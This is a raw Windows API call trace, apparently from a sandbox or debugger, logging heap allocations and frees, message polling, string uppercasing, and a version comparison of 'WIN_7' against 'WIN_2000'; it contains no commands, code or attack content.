[0266.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.014] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0266.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.014] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0266.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0266.015] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.015] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.015] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0266.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.016] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0266.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.017] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0266.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.018] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0266.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.018] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0266.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0266.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0266.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0266.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.020] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.021] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.021] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.022] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0266.022] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.022] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 